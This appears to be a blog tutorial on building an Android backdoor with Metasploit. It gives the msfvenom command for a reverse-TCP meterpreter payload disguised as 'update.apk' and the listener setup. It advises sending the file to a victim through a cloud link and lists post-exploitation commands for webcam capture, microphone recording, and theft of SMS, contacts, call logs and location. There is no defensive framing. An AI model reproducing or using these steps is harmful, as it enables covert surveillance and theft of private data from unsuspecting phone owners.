Creating a basic backdoor on an android mobile
In this article you’ll be learning the most basic way to hack an android mobile phone using Metasploit framework.
Note: you can do this in both LAN and WAN
#1. Create a reverse TCP shell for android
This is the malware file that you create to backdoor the android
Replace the ‘LHOST’ with your host machine IP address.
View your IP by executing ‘ip a’ command on terminal.
You can even use your public IP here.
Using your public IP allows you to hack any mobile out side your network.
Means you can backdoor any ‘android mobile’ in the world.
Note: To use public IP, your host machine should have enabled port forwarding on router.
-p = payload.
msfvenom -p android/meterpreter/reverse_tcp LHOST= 192.168.1.7 LPORT=4444 R > /root/update.apk
#2. Start Metasploit framework
Start the Metasploit framework in a new terminal
msfconsole
#3. Start the multi handler
You need to start the multi handler exploit to create the listener.
Why we put this multi handler?
This is for when you are executing the backdoor in the victim’s mobile (which is outside the framework) and you need to connect back to take control.
The multi handler exploit;
- can be used to attack multiple hosts
- is compatible with many payloads
- also works as a listener
msf6 > use exploit/multi/handler
#4. Set the payload for the multi handler
Set the payload for the multi handler to receive the shell from
We set here the same payload that we have created on step#1
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
#5. Set the host address
You need to set the IP of your attacker machine to gain back the shell to your machine
msf6 exploit(multi/handler) > set LHOST 192.168.1.7
#6. Set the port
Set the listening port of your host machine, In this case I’ll put port 4444.
msf6 exploit(multi/handler) > set LPORT 4444
#7. Start exploit
You can now start the listener by executing ‘exploit’ command.
msf6 exploit(multi/handler) > exploit
#8. Install the backdoor
Install the malware backdoor in the victim’s mobile you have created on step#1.
You can upload the malware file into a cloud service like dropbox or zippyshare and send the link to the victim.
As the victim installs the ‘update.apk’
WOOPIES!!
Simple as that!!
You will get the meterpreter prompt as on the Figure 8!!
#9. Post exploitation
Below are some post exploitation commands for you to try after you get the meterpreter prompt.
- sysinfo
- webcam_list
- webcam_snap
- record_mic
- activity_start
- check_root
- dump_calllog
- dump_contacts
- geolocate
- wlan_geolocate
- send_sms
- sms_dump
#10. References
- https://gist.github.com/mataprasad/c5dd39154a852cdc67ff7958e0a82699
- https://www.hackers-arise.com/post/2018/07/06/metasploit-basics-part-13-exploiting-android-mobile-devices
- https://irfaanshakeel.medium.com/hacking-android-phone-remotely-using-metasploit-43ccf0fbe9b8
- https://www.hackeracademy.org/how-to-exploit-android-phones-with-metasploit-and-msfvenom/
Follow me to see more content like this!
Find me on YouTube; https://www.youtube.com/channel/UCo3VR-oBTt8PPbvu64D_k0g
Leave a clap or two if you like this article!